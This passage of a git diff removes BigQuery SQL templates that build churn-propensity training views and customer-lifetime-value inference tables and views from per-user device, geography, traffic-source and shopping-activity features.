- add_to_carts_past_4_day, -- The number of items added to carts in the past 4 days for each user. - add_to_carts_past_5_day, -- The number of items added to carts in the past 5 days for each user. - add_to_carts_past_6_day, -- The number of items added to carts in the past 6 days for each user. - add_to_carts_past_7_day, -- The number of items added to carts in the past 7 days for each user. - add_to_carts_past_8_14_day, -- The number of items added to carts in the past 8-14 days for each user. - add_to_carts_past_15_30_day, -- The number of items added to carts in the past 15-30 days for each user. - checkouts_past_1_day, -- The number of checkouts in the past 1 day for each user. - checkouts_past_2_day, -- The number of checkouts in the past 2 days for each user. - checkouts_past_3_day, -- The number of checkouts in the past 3 days for each user. - checkouts_past_4_day, -- The number of checkouts in the past 4 days for each user. - checkouts_past_5_day, -- The number of checkouts in the past 5 days for each user. - checkouts_past_6_day, -- The number of checkouts in the past 6 days for each user. - checkouts_past_7_day, -- The number of checkouts in the past 7 days for each user. - checkouts_past_8_14_day, -- The number of checkouts in the past 8-14 days for each user. - checkouts_past_15_30_day, -- The number of checkouts in the past 15-30 days for each user. - churned -- Whether the user churned. - FROM ( - SELECT - DISTINCT *, - -- Adding a random number to the rows to shuffle them. - ROW_NUMBER() OVER (PARTITION BY churned ORDER BY RAND()) AS rn - FROM - `{{project_id}}.{{dataset}}.v_churn_propensity_training_30_30` ) - WHERE - rn <= ( - SELECT - -- Counting the number of churned users. 
- COUNT(churned) - FROM - `{{project_id}}.{{dataset}}.v_churn_propensity_training_30_30` - WHERE - churned = 1) -; - - CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_churn_propensity_training_30_30_last_window` (processed_timestamp, data_split, diff --git a/sql/procedure/customer_lifetime_value_inference_preparation.sqlx b/sql/procedure/customer_lifetime_value_inference_preparation.sqlx index 497f4a7c..c635ed3c 100644 --- a/sql/procedure/customer_lifetime_value_inference_preparation.sqlx +++ b/sql/procedure/customer_lifetime_value_inference_preparation.sqlx @@ -485,248 +485,6 @@ CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.customer_lifetime_value_infe FROM `{{project_id}}.{{dataset}}.{{insert_table}}` ); -CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.customer_lifetime_value_inference_180_90` AS( - SELECT DISTINCT - -- Adding processed_timestamp column with current timestamp - CURRENT_TIMESTAMP() AS processed_timestamp, - -- Adding feature_date column as it is - feature_date, - -- Adding user_pseudo_id column as it is - user_pseudo_id, - -- Selecting the last value of user_id for each user_pseudo_id and feature_date - LAST_VALUE(user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS user_id, - -- Selecting the last value of device_category for each user_pseudo_id and feature_date - LAST_VALUE(device_category) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_category, - -- Selecting the last value of device_mobile_brand_name for each user_pseudo_id and feature_date - LAST_VALUE(device_mobile_brand_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_brand_name, - -- Selecting the last value of device_mobile_model_name for each user_pseudo_id and feature_date - LAST_VALUE(device_mobile_model_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_model_name, - -- Selecting the last value of device_os for each user_pseudo_id and feature_date - LAST_VALUE(device_os) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_os, - -- Selecting the last value of device_language for each user_pseudo_id and feature_date - LAST_VALUE(device_language) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_language, - -- Selecting the last value of device_web_browser for each user_pseudo_id and feature_date - LAST_VALUE(device_web_browser) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_web_browser, - -- Selecting the last value of geo_sub_continent for each user_pseudo_id and feature_date - LAST_VALUE(geo_sub_continent) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_sub_continent, - -- Selecting the last value of geo_country for each user_pseudo_id and feature_date - LAST_VALUE(geo_country) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_country, - -- Selecting the last value of geo_region for each user_pseudo_id and feature_date - LAST_VALUE(geo_region) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_region, - -- Selecting the last value of geo_city for each user_pseudo_id and feature_date - LAST_VALUE(geo_city) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_city, - -- Selecting the last value of geo_metro for each user_pseudo_id and feature_date - LAST_VALUE(geo_metro) OVER(PARTITION BY 
user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_metro, - -- Selecting the last value of last_traffic_source_medium for each user_pseudo_id and feature_date - LAST_VALUE(last_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_medium, - -- Selecting the last value of last_traffic_source_name for each user_pseudo_id and feature_date - LAST_VALUE(last_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_name, - -- Selecting the last value of last_traffic_source_source for each user_pseudo_id and feature_date - LAST_VALUE(last_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_source, - -- Selecting the last value of first_traffic_source_medium for each user_pseudo_id and feature_date - LAST_VALUE(first_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_medium, - -- Selecting the last value of first_traffic_source_name for each user_pseudo_id and feature_date - LAST_VALUE(first_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_name, - -- Selecting the last value of first_traffic_source_source for each user_pseudo_id and feature_date - LAST_VALUE(first_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_source, - -- Selecting the last value of has_signed_in_with_user_id for each user_pseudo_id and feature_date - LAST_VALUE(has_signed_in_with_user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS has_signed_in_with_user_id, - -- Selecting the last value of active_users_past_1_30_day for each user_pseudo_id and feature_date - LAST_VALUE(active_users_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_1_30_day, - -- Selecting the last value of active_users_past_30_60_day for each user_pseudo_id and feature_date - LAST_VALUE(active_users_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_30_60_day, - -- Selecting the last value of active_users_past_60_90_day for each user_pseudo_id and feature_date - LAST_VALUE(active_users_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_60_90_day, - -- Selecting the last value of active_users_past_90_120_day for each user_pseudo_id and feature_date - LAST_VALUE(active_users_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_90_120_day, - -- Selecting the last value of active_users_past_120_150_day for each user_pseudo_id and feature_date - LAST_VALUE(active_users_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_120_150_day, - -- Selecting the last value of active_users_past_150_180_day for each user_pseudo_id and feature_date - LAST_VALUE(active_users_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_150_180_day, - -- Selecting the last value of purchases_past_1_30_day for each user_pseudo_id and feature_date - LAST_VALUE(purchases_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS 
purchases_past_1_30_day, - -- Selecting the last value of purchases_past_30_60_day for each user_pseudo_id and feature_date - LAST_VALUE(purchases_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_30_60_day, - -- Selecting the last value of purchases_past_60_90_day for each user_pseudo_id and feature_date - LAST_VALUE(purchases_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_60_90_day, - -- Selecting the last value of purchases_past_90_120_day for each user_pseudo_id and feature_date - LAST_VALUE(purchases_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_90_120_day, - -- Selecting the last value of purchases_past_120_150_day for each user_pseudo_id and feature_date - LAST_VALUE(purchases_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_120_150_day, - -- Selecting the last value of purchases_past_150_180_day for each user_pseudo_id and feature_date - LAST_VALUE(purchases_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_150_180_day, - -- Selecting the last value of visits_past_1_30_day for each user_pseudo_id and feature_date - LAST_VALUE(visits_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_1_30_day, - -- Selecting the last value of visits_past_30_60_day for each user_pseudo_id and feature_date - LAST_VALUE(visits_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_30_60_day, - -- Selecting the last value of visits_past_60_90_day for each user_pseudo_id and feature_date - LAST_VALUE(visits_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_60_90_day, - -- Selecting the last value of visits_past_90_120_day for each user_pseudo_id and feature_date - LAST_VALUE(visits_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_90_120_day, - -- Selecting the last value of visits_past_120_150_day for each user_pseudo_id and feature_date - LAST_VALUE(visits_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_120_150_day, - -- Selecting the last value of visits_past_150_180_day for each user_pseudo_id and feature_date - LAST_VALUE(visits_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_150_180_day, - -- Selecting the last value of view_items_past_1_30_day for each user_pseudo_id and feature_date - LAST_VALUE(view_items_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_1_30_day, - -- Selecting the last value of view_items_past_30_60_day for each user_pseudo_id and feature_date - LAST_VALUE(view_items_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_30_60_day, - -- Selecting the last value of view_items_past_60_90_day for each user_pseudo_id and feature_date - LAST_VALUE(view_items_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_60_90_day, - -- Selecting the last value of view_items_past_90_120_day for each user_pseudo_id and feature_date - LAST_VALUE(view_items_past_90_120_day) OVER(PARTITION BY 
user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_90_120_day, - -- Selecting the last value of view_items_past_120_150_day for each user_pseudo_id and feature_date - LAST_VALUE(view_items_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_120_150_day, - -- Selecting the last value of view_items_past_150_180_day for each user_pseudo_id and feature_date - LAST_VALUE(view_items_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_150_180_day, - -- Selecting the last value of add_to_carts_past_1_30_day for each user_pseudo_id and feature_date - LAST_VALUE(add_to_carts_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_1_30_day, - -- Selecting the last value of add_to_carts_past_30_60_day for each user_pseudo_id and feature_date - LAST_VALUE(add_to_carts_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_30_60_day, - -- Selecting the last value of add_to_carts_past_60_90_day for each user_pseudo_id and feature_date - LAST_VALUE(add_to_carts_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_60_90_day, - -- Selecting the last value of add_to_carts_past_90_120_day for each user_pseudo_id and feature_date - LAST_VALUE(add_to_carts_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_90_120_day, - -- Selecting the last value of add_to_carts_past_120_150_day for each user_pseudo_id and feature_date - LAST_VALUE(add_to_carts_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_120_150_day, - -- Selecting the last value of add_to_carts_past_150_180_day for each user_pseudo_id and feature_date - LAST_VALUE(add_to_carts_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_150_180_day, - -- Selecting the last value of checkouts_past_1_30_day for each user_pseudo_id and feature_date - LAST_VALUE(checkouts_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_1_30_day, - -- Selecting the last value of checkouts_past_30_60_day for each user_pseudo_id and feature_date - LAST_VALUE(checkouts_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_30_60_day, - -- Selecting the last value of checkouts_past_60_90_day for each user_pseudo_id and feature_date - LAST_VALUE(checkouts_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_60_90_day, - -- Selecting the last value of checkouts_past_90_120_day for each user_pseudo_id and feature_date - LAST_VALUE(checkouts_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_90_120_day, - -- Selecting the last value of checkouts_past_120_150_day for each user_pseudo_id and feature_date - LAST_VALUE(checkouts_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_120_150_day, - -- Selecting the last value of checkouts_past_150_180_day for each user_pseudo_id and feature_date - LAST_VALUE(checkouts_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS 
checkouts_past_150_180_day - FROM `{{project_id}}.{{dataset}}.{{insert_table}}` -); - -CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.customer_lifetime_value_inference_180_180` AS( - SELECT DISTINCT - -- Retrieves the current timestamp when the query is executed. - CURRENT_TIMESTAMP() AS processed_timestamp, - -- The date for which the features are extracted. - feature_date, - -- The unique identifier for the user. - user_pseudo_id, - -- Extracts the last user ID for each user_pseudo_id and feature_date. - LAST_VALUE(user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS user_id, - -- Extracts the last device category for each user_pseudo_id and feature_date. - LAST_VALUE(device_category) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_category, - -- Extracts the last device mobile brand name for each user_pseudo_id and feature_date. - LAST_VALUE(device_mobile_brand_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_brand_name, - -- Extracts the last device mobile model name for each user_pseudo_id and feature_date. - LAST_VALUE(device_mobile_model_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_model_name, - -- Extracts the last device operating system for each user_pseudo_id and feature_date. - LAST_VALUE(device_os) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_os, - -- Extracts the last device language for each user_pseudo_id and feature_date. - LAST_VALUE(device_language) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_language, - -- Extracts the last device web browser for each user_pseudo_id and feature_date. - LAST_VALUE(device_web_browser) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_web_browser, - -- Extracts the last geo subcontinent for each user_pseudo_id and feature_date. - LAST_VALUE(geo_sub_continent) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_sub_continent, - -- Extracts the last geo country for each user_pseudo_id and feature_date. - LAST_VALUE(geo_country) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_country, - -- Extracts the last geo region for each user_pseudo_id and feature_date. - LAST_VALUE(geo_region) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_region, - -- Extracts the last geo city for each user_pseudo_id and feature_date. - LAST_VALUE(geo_city) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_city, - -- Extracts the last geo metro for each user_pseudo_id and feature_date. - LAST_VALUE(geo_metro) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_metro, - -- Extracts the last traffic source medium for each user_pseudo_id and feature_date. - LAST_VALUE(last_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_medium, - -- Extracts the last traffic source name for each user_pseudo_id and feature_date. - LAST_VALUE(last_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_name, - -- Extracts the last traffic source source for each user_pseudo_id and feature_date. 
- LAST_VALUE(last_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_source, - -- Extracts the last first traffic source medium for each user_pseudo_id and feature_date. - LAST_VALUE(first_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_medium, - -- Extracts the last first traffic source name for each user_pseudo_id and feature_date. - LAST_VALUE(first_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_name, - -- Extracts the last first traffic source source for each user_pseudo_id and feature_date. - LAST_VALUE(first_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_source, - -- Extracts the last has_signed_in_with_user_id for each user_pseudo_id and feature_date. - LAST_VALUE(has_signed_in_with_user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS has_signed_in_with_user_id, - -- Extracts the last active_users_past_1_30_day for each user_pseudo_id and feature_date. - LAST_VALUE(active_users_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_1_30_day, - -- Extracts the last active_users_past_30_60_day for each user_pseudo_id and feature_date. - LAST_VALUE(active_users_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_30_60_day, - -- Extracts the last active_users_past_60_90_day for each user_pseudo_id and feature_date. - LAST_VALUE(active_users_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_60_90_day, - -- Extracts the last active_users_past_90_120_day for each user_pseudo_id and feature_date. - LAST_VALUE(active_users_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_90_120_day, - -- Extracts the last active_users_past_120_150_day for each user_pseudo_id and feature_date. - LAST_VALUE(active_users_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_120_150_day, - -- Extracts the last active_users_past_150_180_day for each user_pseudo_id and feature_date. - LAST_VALUE(active_users_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_150_180_day, - -- Extracts the last purchases_past_1_30_day for each user_pseudo_id and feature_date. - LAST_VALUE(purchases_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_1_30_day, - -- Extracts the last purchases_past_30_60_day for each user_pseudo_id and feature_date. - LAST_VALUE(purchases_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_30_60_day, - -- Extracts the last purchases_past_60_90_day for each user_pseudo_id and feature_date. - LAST_VALUE(purchases_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_60_90_day, - -- Extracts the last purchases_past_90_120_day for each user_pseudo_id and feature_date. 
- LAST_VALUE(purchases_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_90_120_day, - -- Extracts the last purchases_past_120_150_day for each user_pseudo_id and feature_date. - LAST_VALUE(purchases_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_120_150_day, - -- Extracts the last purchases_past_150_180_day for each user_pseudo_id and feature_date. - LAST_VALUE(purchases_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_150_180_day, - -- Extracts the last visits_past_1_30_day for each user_pseudo_id and feature_date. - LAST_VALUE(visits_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_1_30_day, - -- Extracts the last visits_past_30_60_day for each user_pseudo_id and feature_date. - LAST_VALUE(visits_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_30_60_day, - -- Extracts the last visits_past_60_90_day for each user_pseudo_id and feature_date. - LAST_VALUE(visits_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_60_90_day, - -- Extracts the last visits_past_90_120_day for each user_pseudo_id and feature_date. - LAST_VALUE(visits_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_90_120_day, - -- Extracts the last visits_past_120_150_day for each user_pseudo_id and feature_date. - LAST_VALUE(visits_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_120_150_day, - -- Extracts the last visits_past_150_180_day for each user_pseudo_id and feature_date. - LAST_VALUE(visits_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_150_180_day, - -- Extracts the last view_items_past_1_30_day for each user_pseudo_id and feature_date. - LAST_VALUE(view_items_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_1_30_day, - -- Extracts the last view_items_past_30_60_day for each user_pseudo_id and feature_date. - LAST_VALUE(view_items_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_30_60_day, - -- Extracts the last view_items_past_60_90_day for each user_pseudo_id and feature_date. - LAST_VALUE(view_items_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_60_90_day, - -- Extracts the last view_items_past_90_120_day for each user_pseudo_id and feature_date. - LAST_VALUE(view_items_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_90_120_day, - -- Extracts the last view_items_past_120_150_day for each user_pseudo_id and feature_date. - LAST_VALUE(view_items_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_120_150_day, - -- Extracts the last view_items_past_150_180_day for each user_pseudo_id and feature_date. - LAST_VALUE(view_items_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_150_180_day, - -- Extracts the last add_to_carts_past_1_30_day for each user_pseudo_id and feature_date. 
- LAST_VALUE(add_to_carts_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_1_30_day, - -- Extracts the last add_to_carts_past_30_60_day for each user_pseudo_id and feature_date. - LAST_VALUE(add_to_carts_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_30_60_day, - -- Extracts the last add_to_carts_past_60_90_day for each user_pseudo_id and feature_date. - LAST_VALUE(add_to_carts_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_60_90_day, - -- Extracts the last add_to_carts_past_90_120_day for each user_pseudo_id and feature_date. - LAST_VALUE(add_to_carts_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_90_120_day, - -- Extracts the last add_to_carts_past_120_150_day for each user_pseudo_id and feature_date. - LAST_VALUE(add_to_carts_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_120_150_day, - -- Extracts the last add_to_carts_past_150_180_day for each user_pseudo_id and feature_date. - LAST_VALUE(add_to_carts_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_150_180_day, - -- Extracts the last checkouts_past_1_30_day for each user_pseudo_id and feature_date. - LAST_VALUE(checkouts_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_1_30_day, - -- Extracts the last checkouts_past_30_60_day for each user_pseudo_id and feature_date. - LAST_VALUE(checkouts_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_30_60_day, - -- Extracts the last checkouts_past_60_90_day for each user_pseudo_id and feature_date. - LAST_VALUE(checkouts_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_60_90_day, - -- Extracts the last checkouts_past_90_120_day for each user_pseudo_id and feature_date. - LAST_VALUE(checkouts_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_90_120_day, - -- Extracts the last checkouts_past_120_150_day for each user_pseudo_id and feature_date. - LAST_VALUE(checkouts_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_120_150_day, - -- Extracts the last checkouts_past_150_180_day for each user_pseudo_id and feature_date. 
- LAST_VALUE(checkouts_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_150_180_day - FROM `{{project_id}}.{{dataset}}.{{insert_table}}` -); - CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_customer_lifetime_value_inference_180_30` (processed_timestamp, @@ -920,392 +678,3 @@ SELECT DISTINCT WHERE -- Filter only for one row for each user_pseudo_id user_row_order = 1; - - - -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_customer_lifetime_value_inference_180_90` -(processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day - ) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL {{expiration_duration_hours}} HOUR), - friendly_name="v_customer_lifetime_value_inference_180_90", - description="View Purchase Propensity Inference dataset using 15 days back to predict 7 days ahead. 
View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS -SELECT DISTINCT - processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day -FROM( -SELECT DISTINCT - processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - 